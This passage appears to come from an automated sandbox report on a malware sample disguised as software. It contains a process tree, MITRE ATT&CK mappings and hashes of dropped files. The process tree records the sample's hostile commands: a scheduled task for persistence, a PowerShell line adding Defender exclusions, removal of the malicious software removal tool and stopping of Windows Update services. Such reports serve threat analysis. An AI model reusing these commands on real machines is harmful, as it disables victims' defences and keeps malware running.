    - Command and Scripting Interpreter: PowerShell
    PID:6004
- C:\GNADR\bitohopad.exe
  "C:\GNADR\bitohopad.exe"
  2⤵
  PID:2124
- C:\GNADR\beptiakdfg.exe
  "C:\GNADR\beptiakdfg.exe"
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:6052
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5640
- C:\GNADR\bntiasklda.exe
  "C:\GNADR\bntiasklda.exe"
  2⤵
  PID:1072

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5344

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
PID:5368
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5212
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2904
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2296
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5788
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4408
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1312

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25

Filesize
1KB

MD5
c42e4042d79ba0e3b08ed6a4591d790b

SHA1
2ab7b32a3aef123f7472dde547c6e4161d056ef9

SHA256
304f4cbbb2fe1e8e54f420793880a2678172f4b689a9ede251dc9a35e49040cc

SHA512
7c6682df613661d4ad2109f911533a273cec083e479b426e1411cef8d4df664e5de61d9b23dfd6114223ccc14c4dcaaffaf857c94e56f4fe92e310f3d69571cd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D0E1C4B6144E7ECAB3F020E4A19EFC29_B5F77004C894173A10E3A199871D2D90

Filesize
979B

MD5
2ca893039231e0c42abb075a621d233a

SHA1
d4ada98e04cb985c7d9a0b1e7c1c88f3592cb829

SHA256
41e1ebfa6c635a7f8be282c00f958140cc793f5a88a136c89eb75d2f74df9030

SHA512
bdb5858a03abcb54185018246940f2cfa9462547f26b7ff77ee1d9ca5ca66a1173c4d35c36812f062edb05bd9f023dfa3553b82e88789bc6098ce4ee05ea5a93

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D9CA54E0FA212456E1DB00704A97658E

Filesize
283B

MD5
66dac2f613225dc8abadaf064c1b3c8c

SHA1
c7568e8d700bd36e05d7e967f2ae1c72eeafa7a9

SHA256
12e2b72c8880faa18e6916684559fa5dc9035356655bc07d3466423dd7c70a28

SHA512
ec7de98b3471270b1f201e4ac13d9e248c2d0c873720ee2728438482c1239fbd0940d7a140d684282a5054c0b9c7c6bb97d643b071ef56cd835f88fbcf2e986d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
6f4db0f79098e86674490797cfbfbb1f

SHA1
2fc7848f91b96e531568b9dad473fe8b135557a0

SHA256
e37cdad87547f1946b6382f9cf585d9f9bff245eb538160264e14272787fd41c

SHA512
4af40953971fb9a8cb91ab6f48519d1f072c23ed5530686b31696e0989169376657373f1d59728ca859de9abfe1f6fb8034f0c6afef4d5ca735532f49518482a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25

Filesize
482B

MD5
43b78f2926fb3fa535eb658be3dfdd34

SHA1
15e58e3440907eed8fa3432d2121421eeda46bd4

SHA256
9be7f304f9c334ebf46d4d3a2d7c5727ce0b915c6299ce0a38d3e8ca794d59d7

SHA512
7c1af7829902b99c9be8d3171c8c55b779ecb4db0150b86abb16c6639422721a3362cd2ba4d77f8fbf1a29f450b750886aca09270b9065b525bb58763c678567

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D0E1C4B6144E7ECAB3F020E4A19EFC29_B5F77004C894173A10E3A199871D2D90

Filesize
480B

MD5
515b7a39c37b834247cc4c68b0eb9833

SHA1
89a36de2b3515ff0a047e64886338bc87818f1c2

SHA256
db1ed5e785d4dfde85961b0ee58bab43d178ed5486f11e7013d8aa6d61aaa186

SHA512
96bd96c21efdd279192c8bc7946119e2efebb26a93510d664b3db036f84413af385484d04ac01c3712fea1e867ff27812243bf0787dcd0addc46d2fb9654ec8a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D9CA54E0FA212456E1DB00704A97658E

Filesize
476B

MD5
ae30360cd451ef6df0ac47b4dc1ca7ac

SHA1
695a1744e50971a95cba9d1936b6a3733d41380d

SHA256
767d071aa38fbf3ab3cfcbc9876141d297bed1d0844ad35ab537bf3fd1f73a7c

SHA512
0fbf823f0e2301fca71095cc43307adb40b2616de823e3ed8f433642a517a7f259e1cad767cd9cb79404db0e53f1d62d1a1b8742ebd137e4baa752d2c841b268

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
5b9c37498a6822a4cc52c0ed9d7cce82

SHA1
f3e57364836ef92e4158b027211cba4432dee23a

SHA256
63fe7f73d692bbdf57127dd5c680e771618ff0819d551bf139ffe892ef00cec0

SHA512
a9c035c5fafc9230a7ab96f559b600e771c80a4650dd33960d9b43cc30a75429e11819e91afbe2148178dee85668aa9d1c588327f21d9785a8588bf53befaee9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
194af9cc0b7ad1b3f3000fef29f380f3

SHA1
f1892b0f7e7752d273486abef5400522775e41f6

SHA256
2b1ca71e8e626d861e6f892a5c92c99611d02ca13c8fe2342232cb4f59c221dc

SHA512
b6ae0cb32f4a3135dc2a2decfd2c18093699417a46b249f7889933f17a5f35af295fa77a0e578a8a49e7d536ce5eede25dbdd0dfee013d2db6c2cc82384e59d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ebe09c3d-c349-448d-b0b2-073be7720163.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8a6b401762a4150ca10ffc209a1390cf

SHA1
7a0d67b10e1bb08cea52bf9093f58cb58e907f79

SHA256
562a64835b66fda06e8607fa314d8d7bd87ba9f67f14c298e6670c984794f73a

SHA512
054d79db539677b230a4ec0e680df2a75fbc2f248103a19c70841b5cbafe423c179bff3fea3c3d488d59c5aa6ed85a3ab7596de793f6bda8dc51e6fd2c2c7b99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
39c51e5592e99966d676c729e840107b

SHA1
e2dd9be0ffe54508a904d314b3cf0782a9a508b7

SHA256
29f29a3495976b65de3df2d537628d260bc005da5956b262ff35e9f61d3d9ed3

SHA512
b20532d0131b12603410c3cb425cb5df0ddc740f34e688455eff757802ffc854be771b30c3ff196e56b396c6fe53928a1577c8330b00f3f7b849fcf625e51bf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
39e376ee2f541e6b1ed0bca701e8fb59

SHA1
bfe3cc2eed8721339d433533aef6e18e0a13a9a3

SHA256
80eda1e4d8c05e257ff17ef734d606e67d8ab70b3e351430b2b231631eed5e04

SHA512
a3f082c32857db0e3dec24394a259fff85e21b6a7b057ef55933504c23ec38cbb3237eb519d38385fc53cbc584c52aaf66291f44231245d9afee509a108a3350

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000029

Filesize
215KB

MD5
0e9976cf5978c4cad671b37d68b935ef

SHA1
9f38e9786fbab41e6f34c2dcc041462eb11eccbc

SHA256
5e8e21f87c0a104d48abc589812e6f4e48655cabe4356cda9e3c1ceee0acaa4e

SHA512
2faa6fff6b47e20fd307a206827dc7ff4892fce8b55b59b53d3e45b7dcf5fd34cebc4776b63da5aa4d0e0408344bd4602d26d09e7a456dd286e93b768cbfaa51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
8159c85582cef2410ec37f2af558abc4

SHA1
5ac163338c29cbc8bd8663519057df59144be51c

SHA256
3dea0a33842977ef8a9e02d32c2cf2dc9015e9a442a01807420a5c6824764b44

SHA512
45d13aa832f24d32031f352677fa4271167214a0b5b92393a8667fb16ffedea9c21f3c426c3f155c9626bb5c4f41b521ba5e94fa085cae3c7d7365fd1814d91a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
3e88c66117947db7bdd1fa9cb8e372f2

SHA1
0ae76b9b508b8f541360e442cc4ae2becd1907f7

SHA256
f12c94969b9a0c28838381ebe51e5bbaf883c0aff2347c7e76b94b53c3914bc6

SHA512
de964770bf88694234b37cb82666be8c2de463149478aa94825d3e3cc8808d7f720b38d69a7b1f4e60b80cb902b8b66f5dce08d194c28ffb6f232b05c77d9f0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
0b860f23cb319f19c96a5f39d39190b5

SHA1
51e39ebcbb8969c2cda91b3bc1691e7df3f451cf

SHA256
fe7df76f6b1604dd094008d655a1c242cd78b1ab8616077bf0394084c0e9c19b

SHA512
8e95fa1f48cf769903c4c43987122a9e1d835119542508ebcd3e0ee4a0616eeb9be0b5733f1e012f86229beeeb509c7e39dec510d031cadfee04a78f2b16b46f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
94d463376705340a082f9deb053a0a1f

SHA1
b5e8ba1c463ba73590bd09d447c37694d103f916

SHA256
ed39852cc71076ffd7da85b25802e7c5485b4aefbda589a414c00c2349f3354b

SHA512
eedee3664457e85cb8113d48699218fefe420aacf4a55480002026be04cd4b46bd5539745e08fd6bbec71701c20a37de6343082590f7449ceb82500072d8d8ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
7c9bead43f09c594a0a5504812838acf

SHA1
98b5700b9a40b648d82d38fc934000dafb114308

SHA256
e70c32c561f6a5faad547047b24144ef6acfec3d471a6eeaa506c3c920f5d651

SHA512
ab5e56ec285d1a3ea6d6684d264a94f556f2bf57aecb6a8609567f02f3257441f798f2607c37dd46c7e1ddd9f767aaa0774dc7369bd8eba28053e34e1296390c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2a17c88b61a6e00c0fd203d53272c5e8

SHA1
e13d505f0941e6476fb809bdf8c8c11801ed2df8

SHA256
3ed21167b0c1b478d0a38d187f6c8baf1d4611c9a1b327b793a7447e3de6cc76

SHA512
d425f5c1f785d5864ee50f20ef813b8fad7a4ca2e5ca3344f423d05d8a936c3af3eff54b283fe9778719acac8c4bee51badc9e7b8bd3b6fc4916549715ad7831

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
3fb06c8198f08e9efb44827eac83d708

SHA1
494e851629a76a5082e158a137ec5e398a3ed326

SHA256
9feef9ba84bd9214c013a800f655c1028630d99b8e2faa491c69613945a67f00

SHA512
ab702fb47c2cebb485d5841d1f096d43998a1eb8b38f20dec972f236158550d7fd43ad0b5e6b1e9725bf0aec884aa6888feb2c5b86d5c36126f841a5d76e2cd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
b0e644ddbcb5933a24ae91f2224f79cb

SHA1
39d8e2e71eb4ae5a2a18c373bab4c70b1e0833bb

SHA256
53d70f589e8f3fff0c8356d603369ac65debea14b71888fe444f5b83cb8e5f31

SHA512
4001a381df24ca67e8bcb665feb59eba06436e0ee3c78ea554724662ded865b29031f2fd7e5946187417fe0410910dcfa0fce3a635465896be71a12d77472992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
ba60bb9908535770e76fdd945b34cc9a

SHA1
4c242e2f64880cada73f16f65465ca9a1f889714

SHA256
91012b692e56e3a284ef387b0702168a0e716878442c914a680a4a94ff89a980

SHA512
f52b89e48e9a16d9bf0c4db21916eb7dbb7ee51118126d8a6fa8e731898f91271c480b6445179dc444c7a0f54bf8b7c228a0313fcc97f8a0148d027186aa0bab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d36edf289f146902d34fed26d5b74d94

SHA1
028dbfd64d7fdf19b1008df64fb55f5113277fa5

SHA256
77318ae12f488310ad405d8898c638275b6f42407e44a3434e489c351fbd28b8

SHA512
0da7ad7da8c6e2b657bb8ab338d04685208d1b602ab1bd6072144c02e01c1f5ac4e3bf186579cc82e14b2edfbaa1bad752e4371068ae6f7dba64f9af314fdb2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
99a2af6059825c49a495d50bda368e5f

SHA1
327f2230192f33202161cf5ac6b2b66d116b67c3

SHA256
c70899f844142210353346113ab625edfa40479f6172fa5e16d266a5722d3972

SHA512
bdd5c1c4cd2273e24eda6c7f315bfe822e52e92882667527b6746b23ea0d085c61db8ecefd2516bfb438986e14c8555b3457a08e70a1c61de8ae8d4347a00318

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58ae5c.TMP

Filesize
48B

MD5
59b63d2c93a456ecbb2d745c782ef14f

SHA1
b7b131c4905fc5b060359ef258626d4411c63808

SHA256
2b786e7a3f4dbba80c7e1e716093df544d6fb923e8c5f018ef5d4c7dd145eb29

SHA512
7cf4404719181e31b8cb41e5125834109835b4a46a9d82d6dae64d7a30aab1dc70e26888e970d9ccb1a936ef2ad8f8aa9626a3a23e21e205fee64a30885a7d3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cbe84474d64e6dbd08290124b79bf9b0

SHA1
7e5701b1eca1ecb79d055df2b74ee792f8dcd235

SHA256
580ac43ae69944d61023c2f1ef5c78210e38960ec7fb0091e13b6605597093ff

SHA512
132535e10b77c5210cb6019cf65fec4bda7385fbdd0c56cc6d64dd34232294d2884b290ad559754f3da3b0df54c4ceac849d659c0fc1d5e4c7a903a8db123248

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1c059f7af48f5e617dee0fb05205b2fe

SHA1
d4248a9d76e876b74a07f8ea267c7deb05084fb3

SHA256
890f7de07b145305c8a830e9f0c39be503e0e2a1c775062d1db119a34fdbcbd3

SHA512
b387e4a18247197b29c17530244885a82aadac5741200cb536b9fa1300f8dc989a4caacd84766114b20d8f0e105c81245ffd1dbdbc6c88fcddc2e36d4224bddf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582f77.TMP

Filesize
1KB

MD5
b8f10c81b6f5d8c2f631bea0ae928d16

SHA1
73eb5f37235bc0391c356f043d56436e3e851f59

SHA256
f42f6faeb79becb017ef5b8130587571ecf478efa9a46b426dd9c2f5e44e2774

SHA512
30c71f87e6d51b84c83c75f97126daab68b32611ec5e6a7c31ed59d3d84f1d8d41a4ed0752dd3d0c23e239284f2d5e641c4a9c39e4898a1b721db7190806dded

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f31dd5282bcdc7edc4c25017a7f0cff5

SHA1
d4099d8086a137a91ff6022fef2ae95c0d179166

SHA256
ca45d066d73d0797ebb1fa21c3fbfbdacb3ce46fb413edacbd0ef082d8dbc887

SHA512
83c92983fe0e04dbbb7a963a93cc98541bb3047255c9cb1a2e38dbce3f881e4535b22e3b156ff784b29736dbd611faaa24b839fbc63f7ecc817c998c547d4ddd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
be09278374a3f750e316ae5b7e32f7b6

SHA1
4cde814d184a2fc3193ca3ec20cae021022e199a

SHA256
af9779b225380d5ca4fbeecae2a96a82f4505c6f391e7f4113b9c8aecd8e86ba

SHA512
b079af4966ad47abe2073ae227e6d4f5e8d122507bfcae1f0a13492b9a59f76d30fae15376f364f3b289d4d1177aab0e510d0da38ce24909272dcfd333cb36d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c1b0a9f26c3e1786191e94e419f1fbf9

SHA1
7f3492f4ec2d93e164f43fe2606b53edcffd8926

SHA256
796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113

SHA512
fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a3769ad4f521a690c97086efc0bd2a17

SHA1
fb685e5afa817b977c0ad5163ab949eb2c296936

SHA256
9e703316c825d991d9ca9be9d39d6e635f2b505670873b2985c897e6c03ef4ba

SHA512
86a585dfb08341a5a85d8f6e66f20869e21c4d3bd2712b82f11bd89ae54a8e9f88829d5c171dbb2fbb1c8e2ebcd513358891ec31f64bc79dcdef1ca308dab80d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a2c8179aaa149c0b9791b73ce44c04d1

SHA1
703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

SHA256
c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

SHA512
2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_npsywif5.50a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\S0FTWARE.rar

Filesize
17.2MB

MD5
9b1f35daa6c2e5297dd79bbfd8d5e81d

SHA1
3d61811fcc06fc87da938502e0a7af8dedbdf561

SHA256
c786c22574d0f8c09bd96b3d0261801ed6ffd445ac9e8e83cc1cf15a7f0022e8

SHA512
6a60710fa223dad41f81f5d3549ffae045bba976b2deee2263986afec1b8a5c553b89a294a76acb86ffa986ec343f38974c85aff6f40c1c377c70e04e0689a46

Download Submit
C:\Users\Admin\Downloads\S0FTWARE\KeyFile\1049\sharedmanagementobjects_keyfile.dll

Filesize
23KB

MD5
5e54cb9759d1a9416f51ac1e759bbccf

SHA1
1a033a7aae7c294967b1baba0b1e6673d4eeefc6

SHA256
f7e5cae32e2ec2c35346954bfb0b7352f9a697c08586e52494a71ef00e40d948

SHA512
32dcca4432ec0d2a8ad35fe555f201fef828b2f467a2b95417b42ff5b5149aee39d626d244bc295dca8a00cd81ef33a20f9e681dd47eb6ee47932d5d8dd2c664

Download Submit
C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe

Filesize
278KB

MD5
478c6dcc7a3856d87670c4b99983a46a

SHA1
e783bfe368575ca51d8d16f2c47efc3f4f850262

SHA256
e53d243d86afb1cac9d7c7042fd02f56be326305bcccd3f7b686ff8c8e68268f

SHA512
c32c317d37287f1b825850a94d1408f22b3c755f4b85651635d539401111c4bb5c20e31587a1dc891c35dd3924392877ef1e271027c15d434d19a3684c38bf15

Download Submit
C:\WJYZS\beptiakdfg.exe

Filesize
28KB

MD5
753175a2a378c1448b5e6946d2421599

SHA1
1a856255b7868a050cebc02845e4af6acb3912ef

SHA256
2a216550fb6ef956beb4029c2c18049a1c66cc271470a09c3b0b6103440e7280

SHA512
07e2c0c976c288d3ed0ffe370f6b5538df2c89edc52a21f6025996135d8e4143341e8a0322f7acbb83b9a6c7bae7c88a492aa39c73c88b21bcce19404f133fb3

Download Submit
C:\WJYZS\bitohopad.exe

Filesize
120KB

MD5
a82869b84484b08fc551e356ea62ef65

SHA1
936e3ff3cf9a18fbda168e5cad7511f5d20dd296

SHA256
d26a649dbfa9b535d9443632ef565bf80793008f46ed18b437e28070dd0870fa

SHA512
b5c1f4150d09dd98a3bbd20096a118ac20674942756fde247ab11ac5c7cdbe9fe09809a9948d2f31ac019f08244346476fe322cd570c9bc07204376733318f2c

Download Submit
C:\WJYZS\bntiasklda.exe

Filesize
5.2MB

MD5
6f163d9cd94d4a58ad722301cf9847d0

SHA1
ffcf6d1a5956dfb60a0fd7267039e30fbe2fd981

SHA256
827642649f28e190ac328f026c6c1a332d45b2be4af76bd8f6c8e85838c90b11

SHA512
5503fefd77a87f8030dbd468168abeb3b778857bd770720942f3f1b41cf498f79a3f9138bb1cb7b24b52f55d67724de31aeb42225ee21c8712719323d45e7d67

Download Submit
memory/2124-1125-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2476-802-0x000001F2D5180000-0x000001F2D51A2000-memory.dmp

Filesize
136KB

Download
memory/2660-921-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3136-881-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3788-1117-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4208-1093-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5332-1054-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5676-1180-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5984-1201-0x0000021653620000-0x00000216536D5000-memory.dmp

Filesize
724KB

Download
